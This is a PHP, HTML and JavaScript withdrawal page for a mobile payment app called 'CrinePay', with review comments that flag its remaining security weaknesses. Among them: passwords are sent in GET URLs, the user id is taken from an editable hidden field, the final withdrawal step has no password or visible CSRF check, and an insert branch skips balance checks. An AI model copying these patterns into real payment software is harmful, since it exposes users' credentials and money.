<html>
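<?php
// Page bootstrap for the withdrawal screen: load db.php, resume the session,
// look up the visitor's approximate location and capture the current date parts.
include('db.php');
session_start();

// Id of the logged-in user, or null for an anonymous visitor. Initialising it
// unconditionally avoids undefined-variable warnings further down the page.
$my_id = isset($_SESSION['id']) ? $_SESSION['id'] : null;
?> <div class="help_div">  <?php
// Geo lookup. In this file $city and $country are only referenced by the
// pending_withdrawtb insert further down, yet the lookup runs on every page load.
$user_ip = getenv('REMOTE_ADDR');
$city = '';
$country = '';

// Only call the service with a syntactically valid address, and URL-encode it
// instead of interpolating it raw into the query string.
if(filter_var($user_ip, FILTER_VALIDATE_IP) !== false)
{
	// Bounded wait so a slow third-party service cannot stall the page.
	$geo_ctx = stream_context_create(array('http' => array('timeout' => 3)));
	$geo_raw = file_get_contents("http://www.geoplugin.net/php.gp?ip=" . urlencode($user_ip), false, $geo_ctx);

	if($geo_raw !== false)
	{
		// SECURITY: the body arrives over plain HTTP from a third party, so it is
		// untrusted input. unserialize() on untrusted data allows PHP object
		// injection; allowed_classes=false stops any class from being instantiated.
		// NOTE(review): prefer a JSON response format plus HTTPS for this lookup
		// so unserialize() is not needed at all.
		$geo = unserialize($geo_raw, array('allowed_classes' => false));
		if(is_array($geo))
		{
			$city = isset($geo["geoplugin_city"]) ? (string)$geo["geoplugin_city"] : '';
			$country = isset($geo["geoplugin_countryName"]) ? (string)$geo["geoplugin_countryName"] : '';
		}
	}
}

$cur_date = date("d");
$cur_month = date("M");
$cur_year = date("Y");

?> </div> <?php

//////////////////////////////////////////////////////////////////////////////////// 
// The hidden field below hands the session user id to the page's JavaScript,
// which sends it back to autopage.php as my_id. A hidden input is fully
// editable by the client, so the server side must take the acting user from
// $_SESSION and never from this value (autopage.php is not visible here).
// The value is escaped so it cannot break out of the attribute.
?>
<input id="my_id" style="display:none;" value="<?php echo htmlspecialchars((string)$my_id, ENT_QUOTES, 'UTF-8'); ?>" />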
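<head>
<meta charset="utf-8">
<title>CrinePay withdrawal</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="main_css/withdraw.css" />

</head>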

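<?php
// NOTE(review): get_focused() is not defined in this file and no external
// script is loaded here; confirm where it comes from, otherwise every click on
// the page raises a ReferenceError.
?>
<body onclick="get_focused();"  >

<div class="main_content" >

<div class="main_home_tile" ><img src="main_icon/bk.png" alt="Back" onclick="history.back()"  class="main_icon_img" />Cash withdraw</div>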



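<div class="acc_div" >
<div class="acc_div_left" >
<span class="acc_title" >Account no.</span>

<?php
// Show the logged-in user's account number (stored as user_phone_no).
// The id is bound as a statement parameter instead of being spliced into the
// SQL text, and the value is HTML-escaped before it is printed.
if(isset($_SESSION['id']))
{
	$acct_stmt = mysqli_prepare($con, "select user_phone_no from crane_pay_usertb where id=?");
	if($acct_stmt)
	{
		mysqli_stmt_bind_param($acct_stmt, 's', $my_id);
		mysqli_stmt_execute($acct_stmt);
		mysqli_stmt_bind_result($acct_stmt, $user_acc);
		while(mysqli_stmt_fetch($acct_stmt))
		{
	?>
   <span class="acc_namba" ><?php echo htmlspecialchars((string)$user_acc, ENT_QUOTES, 'UTF-8'); ?></span>
   
<?php
		}
		mysqli_stmt_close($acct_stmt);
	}
}
?>

</div>

<div class="acc_div_right" >

<span class="amt_title" >Available Bal</span>
<?php
// Show the available balance from banktb for the logged-in user.
// Only acc_amount is displayed; the original left profit_gain commented out.
if(isset($_SESSION['id']))
{
	$bank_stmt = mysqli_prepare($con, "select acc_amount from banktb where my_id=?");
	if($bank_stmt)
	{
		mysqli_stmt_bind_param($bank_stmt, 's', $my_id);
		mysqli_stmt_execute($bank_stmt);
		mysqli_stmt_bind_result($bank_stmt, $user_amt);
		while(mysqli_stmt_fetch($bank_stmt))
		{
			$total_amt = $user_amt;
	?>
   <span class="amt_avail" ><?php echo htmlspecialchars((string)$total_amt, ENT_QUOTES, 'UTF-8') . "/="; ?></span>
   
<?php
		}
		mysqli_stmt_close($bank_stmt);
	}
}
?>

</div>

</div>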




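<?php
// Choose which withdrawal form to render: verified agents (a row in agenttb
// with account_type='Verified') get the account/passcode form, everyone else
// gets the amount/password form. The id is bound as a parameter rather than
// interpolated into the SQL string.
$agent_lookup_id = isset($my_id) ? (string)$my_id : '';
$chk_agt = 0;
$agt_stmt = mysqli_prepare($con, "select count(*) from agenttb where my_id=? AND account_type='Verified'");
if($agt_stmt)
{
	mysqli_stmt_bind_param($agt_stmt, 's', $agent_lookup_id);
	mysqli_stmt_execute($agt_stmt);
	mysqli_stmt_bind_result($agt_stmt, $chk_agt);
	mysqli_stmt_fetch($agt_stmt);
	mysqli_stmt_close($agt_stmt);
}

if($chk_agt >0 ){
// Agent form. None of these inputs sits inside a <form>; the button calls
// check_Withdraw(), which reads the fields by id. The misspelled "minlengthk"
// attribute was dropped: it is not a valid attribute and had no effect.
?>


<div id="withdraw_input_div" class="withdraw_input_div" >

<span class="withd_amnt_lebal" >From Account no. 75*******</span>
<input type="number" id="wizd_from_acc_no" name="acc_no" maxlength="9" class="withd_acc_name_input"/>
<span class="withd_acc_name_lebal" >Passcode</span>
<input type="text" id="wizd_passcode" name="withd_amt" autocomplete="off" class="withd_amnt_input" />
<span class="withd_acc_name_lebal" >Password</span>
<input type="password" id="wizd_pass" name="withd_pass" autocomplete="current-password" class="withd_acc_name_input"/>

<button type="button" onclick="check_Withdraw();" name="withdraw_cash_btn" class="withdraw_btn" >Withdraw</button>

</div>
<div id="error_output2" ></div>

<div id="sub_error_output2" ></div>

<?php }else{  ?>

<div class="withdraw_input_div" >


<span class="withd_amnt_lebal" >Amount</span>
<input type="number" id="withd_amt" name="withd_amt" class="withd_amnt_input" />
<span class="withd_acc_name_lebal" >Password</span>
<input type="password" id="withd_pass" name="withd_pass" autocomplete="current-password" class="withd_acc_name_input"/>
<div id="error_output" class="error_output" ></div>

<?php 
// Legacy form-POST handler. Nothing on this page posts a form (the inputs are
// not inside a <form>; the button calls start_Withdraw()). $acc_no,
// $account_no and $user_id are not assigned anywhere in this file, so unless
// db.php defines them the "Fill All The Spaces" branch is the only one that runs.
// NOTE(review): the insert branch does no password or balance check. It must
// not be made reachable as it stands; it is parameterized only so a later
// revival is not also injectable.
if(isset($_POST['withdraw_cash_btn']))
{
	$acc_name = isset($_POST['acc_name']) ? $_POST['acc_name'] : '';
	$withd_amt = isset($_POST['withd_amt']) ? $_POST['withd_amt'] : '';
	// Make the empty defaults explicit instead of relying on undefined variables.
	$acc_no = isset($acc_no) ? $acc_no : '';
	$account_no = isset($account_no) ? $account_no : '';
	$user_id = isset($user_id) ? $user_id : '';

	if($acc_no=="" || $acc_name=="" || $withd_amt==""){
		echo"<span style='float:left;width:100%;height:30px;line-height:30px;color:red;text-align:center;'>Fill All The Spaces</span>";
	}else{
		// One pending_withdrawtb row is inserted per user row matching the phone number.
		$payee_stmt = mysqli_prepare($con, "select fname, lname from crane_pay_usertb where user_phone_no=?");
		mysqli_stmt_bind_param($payee_stmt, 's', $account_no);
		mysqli_stmt_execute($payee_stmt);
		// Buffer the result so the insert can run on the same connection inside the loop.
		mysqli_stmt_store_result($payee_stmt);
		mysqli_stmt_bind_result($payee_stmt, $tofname, $tolname);

		$geo_country = isset($country) ? (string)$country : '';
		$geo_city = isset($city) ? (string)$city : '';
		$insert_stmt = mysqli_prepare($con, "insert into pending_withdrawtb (user_id,account_no,account_name,amount,user_county,user_city,cur_date,cur_month,cur_year,cur_time)
	values(?,?,?,?,?,?,?,?,?,CURTIME() )");
		mysqli_stmt_bind_param($insert_stmt, 'sssssssss', $user_id, $acc_no, $acc_name, $withd_amt, $geo_country, $geo_city, $cur_date, $cur_month, $cur_year);

		while(mysqli_stmt_fetch($payee_stmt))
		{
			mysqli_stmt_execute($insert_stmt);
			echo"<span style='float:left;width:100%;height:30px;line-height:30px;color:green;text-align:center;'>Withdrawal Successful! Will be approved within 24hrs </span>";
		}

		mysqli_stmt_close($insert_stmt);
		mysqli_stmt_close($payee_stmt);
	}
}
?>

<button type="button" onclick="start_Withdraw();" name="withdraw_cash_btn" class="withdraw_btn" >Withdraw</button>


</div>

<?php }  ?>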

</div>



<script> 

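// Validate the non-agent withdrawal form, pick the fee tier for the amount and
// submit the request to autopage.php (status=start_Withdraw), then navigate to
// the transaction page.
//
// Reads #my_id, #withd_amt and #withd_pass; writes messages to #error_output.
//
// NOTE(review): my_id and cur_charj are both supplied by the browser and can be
// edited by the user. autopage.php (not visible here) should take the acting
// user from the session and recompute the fee itself.
// NOTE(review): the password travels in the URL of a GET request, where it can
// end up in server access logs and browser history. Moving it to a POST body
// needs a matching change in autopage.php, so the transport is left as it was.
function start_Withdraw()
{
	// [exclusive upper bound of the tier, fee charged below that bound]
	var fee_tiers = [
		[20001, 200],
		[40001, 450],
		[60001, 750],
		[250001, 1000],
		[500000, 3000],
		[1000001, 4500]
	];

	var out = document.getElementById('error_output');
	var amt_field = document.getElementById('withd_amt');
	var pass_field = document.getElementById('withd_pass');
	var my_id = document.getElementById('my_id').value;
	var withd_amt = amt_field.value;
	var withd_pass = pass_field.value;

	if(withd_amt === "" || withd_pass === ""){
		out.innerHTML ="Please fill all the fields";
		return;
	}

	// Compare as a number; a value that does not parse is treated like an empty field.
	var amount = Number(withd_amt);
	if(isNaN(amount)){
		out.innerHTML ="Please fill all the fields";
		return;
	}
	if(amount < 500){
		out.innerHTML ="Minimum withdrawal must be 500 /=";
		return;
	}
	// The last tier ends below 1000001, so anything above 1,000,000 has no fee
	// tier. The original check (> 1000001) let exactly 1000001 through with no fee set.
	if(amount > 1000000){
		out.innerHTML ="Maximum withdrawal limit 1m";
		return;
	}

	var cur_charj = fee_tiers[fee_tiers.length - 1][1];
	for(var i = 0; i < fee_tiers.length; i++){
		if(amount < fee_tiers[i][0]){
			cur_charj = fee_tiers[i][1];
			break;
		}
	}

	// encodeURIComponent keeps characters such as & = # + in the password or
	// amount from splitting or truncating the query string.
	var query = "my_id=" + encodeURIComponent(my_id)
		+ "&withd_pass=" + encodeURIComponent(withd_pass)
		+ "&withd_amt=" + encodeURIComponent(withd_amt)
		+ "&cur_charj=" + encodeURIComponent(cur_charj)
		+ "&status=start_Withdraw";

	// Synchronous request, as in the original: the lines below rely on the
	// response already being available.
	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","autopage.php?" + query,false);
	xmlhttp.send(null);
	// The response is inserted as markup, so autopage.php must HTML-escape any
	// user-derived text it returns.
	out.innerHTML =xmlhttp.responseText;

	amt_field.value="";
	pass_field.value="";
	window.open('transaction','_self');
}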


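// First step of the agent withdrawal: send the account number, passcode and
// password to autopage.php (status=check_Withdraw) and show its response in
// #error_output2.
//
// The response is expected to contain an element with id "wizd_chk_out"; when
// its value is 1 the input form stays visible, otherwise the form is hidden.
//
// NOTE(review): my_id comes from an editable hidden field, and the password is
// sent in a GET query string where it can be logged. autopage.php (not visible
// here) should identify the user from the session; moving the credentials to a
// POST body needs a matching server change.
function check_Withdraw()
{
	var my_id = document.getElementById('my_id').value;
	var wizd_from_acc_no = document.getElementById('wizd_from_acc_no').value;
	var wizd_passcode = document.getElementById('wizd_passcode').value;
	var pass_field = document.getElementById('wizd_pass');
	var wizd_pass = pass_field.value;
	var sub_error = document.getElementById('sub_error_output2');

	if(wizd_from_acc_no === "" || wizd_passcode === "" || wizd_pass === ""){
		sub_error.innerHTML ="Fill all the fields";
		sub_error.style.cssText ="float:left;width:100%;height:30px;line-height:30px;text-align:center;color:red;display:block;";
		return;
	}

	// Encode every value so characters such as & = # cannot alter the query string.
	var query = "my_id=" + encodeURIComponent(my_id)
		+ "&wizd_from_acc_no=" + encodeURIComponent(wizd_from_acc_no)
		+ "&wizd_passcode=" + encodeURIComponent(wizd_passcode)
		+ "&wizd_pass=" + encodeURIComponent(wizd_pass)
		+ "&status=check_Withdraw";

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","autopage.php?" + query,false);
	xmlhttp.send(null);

	// Clear the password field as soon as the request has been sent.
	pass_field.value="";

	// The response is inserted as markup; autopage.php must HTML-escape any
	// user-derived text it echoes back.
	var response_box = document.getElementById('error_output2');
	response_box.innerHTML =xmlhttp.responseText;
	response_box.style.display="block";

	// The marker only exists if the response contained it. The original read
	// .value on a missing element and threw; now the form is left as it is.
	var marker = document.getElementById('wizd_chk_out');
	if(!marker){
		return;
	}

	var input_div = document.getElementById('withdraw_input_div');
	input_div.style.display = (marker.value == 1) ? "block" : "none";
	sub_error.style.display="none";
}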

// Dismiss the confirmation panel: show the agent input form again and hide the
// server-response box.
function close_confirm_wizd()
{
	var display_by_id = { withdraw_input_div: "block", error_output2: "none" };
	for(var element_id in display_by_id){
		document.getElementById(element_id).style.display = display_by_id[element_id];
	}
}

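// Final step of the agent withdrawal: send the account number and passcode to
// autopage.php (status=finish_Withdraw), show the response in #error_output2
// and navigate to the transaction page.
//
// NOTE(review): this request carries no password and takes my_id from an
// editable hidden field. autopage.php (not visible here) should confirm from
// the session that the check_Withdraw step succeeded for the same user before
// completing anything; otherwise this step can be called directly.
// NOTE(review): a state-changing action sent as GET can be triggered by any
// link or image request; confirm the server requires POST plus a CSRF token.
function finish_Withdraw()
{
	var my_id = document.getElementById('my_id').value;
	var wizd_from_acc_no = document.getElementById('wizd_from_acc_no').value;
	var wizd_passcode = document.getElementById('wizd_passcode').value;

	// Encode every value so characters such as & = # cannot alter the query string.
	var query = "my_id=" + encodeURIComponent(my_id)
		+ "&wizd_from_acc_no=" + encodeURIComponent(wizd_from_acc_no)
		+ "&wizd_passcode=" + encodeURIComponent(wizd_passcode)
		+ "&status=finish_Withdraw";

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","autopage.php?" + query,false);
	xmlhttp.send(null);

	document.getElementById('wizd_pass').value="";

	// The response is inserted as markup; autopage.php must HTML-escape any
	// user-derived text it echoes back.
	var response_box = document.getElementById('error_output2');
	response_box.innerHTML =xmlhttp.responseText;
	response_box.style.display="block";
	window.open('transaction','_self');
}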



</script>



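</body>
</html>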
